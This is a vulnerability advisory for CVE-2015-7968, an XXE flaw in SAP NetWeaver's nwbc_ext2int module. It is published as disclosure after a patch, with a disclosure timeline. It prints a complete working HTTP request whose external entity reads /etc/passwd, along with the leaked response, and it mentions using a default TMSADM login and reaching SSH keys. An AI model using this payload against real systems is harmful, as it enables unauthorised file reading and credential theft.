CVE-2015-7968 - SAP Netweaver Application Server XXE (SAP Security Note 2183189)

1. Vulnerability Properties

Title: XML External Entities (XXE) / Local File Inclusion
CVE ID: CVE-2015-7968
CVSSv3 Base Score: 4.9 AV:N/AC:M/AU:S/C:P/I:N/A:P
Vendor: SAP
Products: SAP NetWeaver Application Server
Advisory Release Date: 12 January 2016
Advisory URL: https://labs.integrity.pt/advisories/cve-2015-7968
Credits: Discovery by Tiago Sintra <ts[at]integrity.pt>

2. Vulnerability Summary

SAP NetWeaver Application Server uses a module called nwbc_ext2int which is vulnerable to XXE attacks. According to the documentation, this node is used when data is to be displayed in a side panel. The node converts the external representation of UI elements to an internal representation.

3. Technical Details

The vulnerability can only be exploited after authentication. For this case study, it was possible to login using the default TMSADM account which seems to be available on various installations by default. Even though access to most areas was not allowed in this account it was possible to enumerate some modules running.

After authentication, we checked which of the default nodes were enabled and found that the nwbc_ext2int responded with XML content. By posting the same XML as the page returned initially, it was possible to get the page to reflect the value on the FIELD_VALUE tag. Since we had a page that accepted XML and reflected our content, the chances of a successful XXE exploitation were good. And in fact, creating a POST request with a simple XXE header proven to be enough to exploit the vulnerability.

POST /sap/bc/ui2/nwbc/nwbc_ext2int/ HTTP/1.1
Host: vulnerablesite.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:35.0)
Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: <cookies>
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 455
<?xml version="1.0" encoding="ISO-8859-1" standalone="no" ?>
<!DOCTYPE xxx [<!ENTITY file SYSTEM "file:///etc/passwd">]>
<asx:abap version="1.0" xmlns:asx="http://www.sap.com/abapxml">
<asx:values>
<ITAB>
<item>
<PROGRAM_NAME>aaaa</PROGRAM_NAME>
<SCREEN_NUMBER>1</SCREEN_NUMBER>
<FIELD_NAME>A</FIELD_NAME>
<FIELD_VALUE>&file;</FIELD_VALUE>
</item>
</ITAB>
</asx:values>
</asx:abap>

Server responded with:

HTTP/1.1 200 OK
content-type: text/xml; charset=utf-8
Content-Length: 4921
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
expires: 0
server: SAP NetWeaver Application Server / ABAP 731

<?xml version="1.0" encoding="utf-8"?><asx:abap version="1.0"
xmlns:asx="http://www.sap.com/abapxml"><asx:values><ITAB><item><PROGRAM_NAME>aaaa</PROGRAM_NAME><SCREEN_NUMBER>1</SCREEN_NUMBER><FIELD_NAME>A</FIELD_NAME><FIELD_VALUE>root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
(...)
</FIELD_VALUE><DATA_ELEMENT/><CONVERSION_STATE/></item></ITAB></asx:values></asx:abap>

Since SAP is a Java based application, the XML parser used allowed us to read not only files but also directories. File access is restricted by the user context used to run SAP. In our case, we got a low privileged user but we could still successfully fetch many SAP configuration files and also the SSH private keys of our user from the /home directory. This could allow an attacker to be able to connect directly to the target server through SSH and consequently gain access to many other exploitable vectors.

4. Vulnerable Versions

  • SAP NetWeaver Application Server / ABAP 731. Previous versions are probably affected as well.

5. Solution

  • SAP has released a patch for this issue. Check references.

6. Vulnerability Timeline

  • 13/06/2015 - Vulnerability reported to SAP
  • 22/07/2015 - Asked SAP for feedback
  • 23/07/2015 - SAP replied stating that the vulnerability was accepted and was not known at that point. SAP also states that a security note would be created for this case.
  • 28/07/2015 - Contacted Mitre requesting a CVE identifier
  • 07/09/2015 - SAP sends an email with the security note details and asking to hold the vulnerability details for the 3 month grace period
  • 23/10/2015 - Mitre replies with the CVE ID
  • 12/01/2016 - Advisory produced and released

7. References